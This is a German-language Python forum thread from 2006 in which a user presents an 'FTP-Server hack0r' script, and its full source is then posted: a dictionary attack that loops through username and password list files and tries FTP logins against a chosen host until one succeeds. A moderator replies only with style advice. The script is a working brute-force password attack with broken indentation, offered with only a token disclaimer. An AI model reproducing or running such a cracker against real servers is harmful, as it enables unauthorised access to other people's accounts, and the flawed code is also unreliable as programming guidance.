Was haltet ihr von meinem Programm?

Du hast eine Idee für ein Projekt?
b0x

Was haltet ihr von meinem Programm?

Beitragvon b0x » Dienstag 10. Januar 2006, 19:13

Ok, nur so als Übung habe ich mal in Python (mit hilfe der ftplib) ein programm geschrieben, um FTP-Server Passwörter zu "knacken" ich machte dies nur zu übungszwecken und bitte euch, damit keinen blödsinn anzustellen...!!

Also was halet ihr von:
http://box.bo.ohost.de/ftpcrack.tar ?
Benutzeravatar
jens
Moderator
Beiträge: 8458
Registriert: Dienstag 10. August 2004, 09:40
Wohnort: duisburg
Kontaktdaten:

Beitragvon jens » Dienstag 10. Januar 2006, 20:55

Ich würde es zumindest mal überfliegen, bin aber ehrlich zu faul mir ein Archiv download und auspacken zu müssen... Kannst du nicht den SourceCode direkt auf die Seite packen???

CMS in Python: http://www.pylucid.org
GitHub | Open HUB | Xing | Linked in
Bitcoins to: 1JEgSQepxGjdprNedC9tXQWLpS424AL8cd
droptix
User
Beiträge: 521
Registriert: Donnerstag 13. Oktober 2005, 21:27

SourceCode v0.3

Beitragvon droptix » Mittwoch 18. Januar 2006, 11:23

Code: Alles auswählen

#Ftp-Server hack0r
#Version 0.3
#By the [GS]Crew!
#Jo!n i-c-e.cx.la !
#You need the "ftplib" =)

#includes
from ftplib import *
import re

#hello
print "Wilkommen zu dem FTP-Cracker v0.3! gestartet von b0x..."
print "natürlich open source :)\n"

#Get variables ^^
host = raw_input("host: ")
port = raw_input("port: ")

#Main prog
number = 0
number2 = 0
number_alt = 0
test = 0

f = open("users.lst")
data = f.readlines()
f.close()

g = open("passes.lst")
data2 = g.readlines()
g.close()

while test==0:
   for i in range(len(data)):
          f = open("users.lst")
          f.seek(number)
          usr = f.readline()
          number = f.tell()
          f.close()

          expr = re.compile("\n")
          usr2=expr.sub("",usr)

      for j in range(len(data2)):
             g = open("passes.lst")
             g.seek(number2)
             pw = g.readline()
         number_alt=number2
             number2 = g.tell()
         if number2==number_alt:
            number2=0
             g.close()

             expr = re.compile("\n")
             pw2=expr.sub("",pw)

             try:
            ftp = FTP(host)
                ftp.connect(host , port)
                ftp.login(usr2 , pw2)
            print "++++++++++FOUND!!++++++++++\n      User: ", usr2, "\n      Pass: ", pw2,"\n+++++++++++++++++++++++++++"
            test=1
             except:
            test = 0
Benutzeravatar
jens
Moderator
Beiträge: 8458
Registriert: Dienstag 10. August 2004, 09:40
Wohnort: duisburg
Kontaktdaten:

Beitragvon jens » Mittwoch 18. Januar 2006, 11:32

Also erstmal würde ich kein Stern-Import machen. Dabei sieht man einfach
schlecht, woher ein Objekt kommt...

Dann ist diese while-Schleife nicht so optimal aufgebaut... Generell würde ich alles in kleinere Häpchen aufteilen und in Funktionen verpacken...

Außerdem scheint mir die Einrückung irgendwie falsch zu sein... Und ich frage mich, warum du die beiden Dateien zweimal öffnest...
Sowas sollte auch gehen:

Code: Alles auswählen

f = file(users.lst)
for line in f: print line
f.close()

CMS in Python: http://www.pylucid.org
GitHub | Open HUB | Xing | Linked in
Bitcoins to: 1JEgSQepxGjdprNedC9tXQWLpS424AL8cd

Wer ist online?

Mitglieder in diesem Forum: 0 Mitglieder